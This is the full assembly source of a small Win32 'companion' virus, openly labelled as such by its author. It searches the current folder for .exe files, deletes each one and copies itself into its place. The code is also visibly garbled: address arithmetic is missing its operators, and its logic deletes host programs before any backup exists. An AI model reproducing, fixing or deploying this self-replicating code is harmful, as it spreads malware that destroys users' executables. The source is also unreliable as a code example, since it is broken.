.386P
Locals
Jumps
.Model flat, stdcall
Simple Win32 Companion Self Replicating Automation
; Jheronimus Bolch - Meta Informatic Syndrome Patients
Code Is Shit But It's Simple-Hope So ....
EXTRN EXITPROCESS: PROC
EXTRN GETCOMMANDLINEA: PROC
EXTRN Messageboxa: Proc
EXTRN MOVEFILEA: PROC
EXTRN FINDFIRSTFILEA: PROC
EXTRN FINDNEXTFILEA: PROC
EXTRN COPYFILEA: PROC
EXTRN Deletefilea: Proc
.DATA
Text DB "bu-hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha", 13, 10;
DB "The Companion IS Getting Alive ...", 0
Caption DB "HELL0", 0
Keimeno DB "Simple Companion W32 Virus", 13, 10
"Basically for Assembly Coding Practice", 13, 10
"Hope You'll Enjoy The Code ...", 13, 10
"w32.shithead", 13, 10
"By Jack Daniels", 0
PSAXNOGIA DB "* .exe", 0
Search_Handle DD 0
MyName DB 40h DUP (0)
NewName DB 40h DUP (0)
Search_Data DB 318 DUP (0)
.Code
MAIN:
Call getcommandlinea
MOV ECX, 0
JAMPO:
MOV BL, BYTE PTR [EAX 1]
MOV BYTE PTR [MyName ECX], BL
INC EAX
Inc ECX
CMP BL, 22h
JNE Jampo
Dec ECX
MOV BYTE PTR [MyName ECX], 0
Push Offset Search_Data
Push offset psaxnogia
Call FindfirstFilea
CMP EAX, -1
Je EXIT
Mov search_handle, EAX
Call Infect
MORE:
Mov Eax, [Search_Handle]
Push Offset Search_Data
Push EAX
Call FindnextFilea
CMP EAX, 0
Je EXIT
CMP Byte PTR [Search_Data 44], "_"
Je EXIT
Call Infect
JMP more
Infect:
MOV ECX, 0
MOV Byte PTR [NewName ECX], "_"
NewNameCreation:
Inc ECX
MOV BL, BYTE PTR [Search_Data 44 ECX-1]
MOV BYTE PTR [NewName ECX], BL
CMP BL, 0
JNE NewNameCreation
PUSH 0
Push Offset Caption
Push offset newname
PUSH 0
Call Messageboxa
Push Offset [Search_Data 44]
Call Deletefilea
Push 1h
Push Offset [Search_Data 44] Push Offset MyName
Call Copyfilea
Push 1h
Push offset newname
Push Offset [Search_Data 44]
Call Copyfilea
RET
EXIT:
Call EXITPROCESS
End main
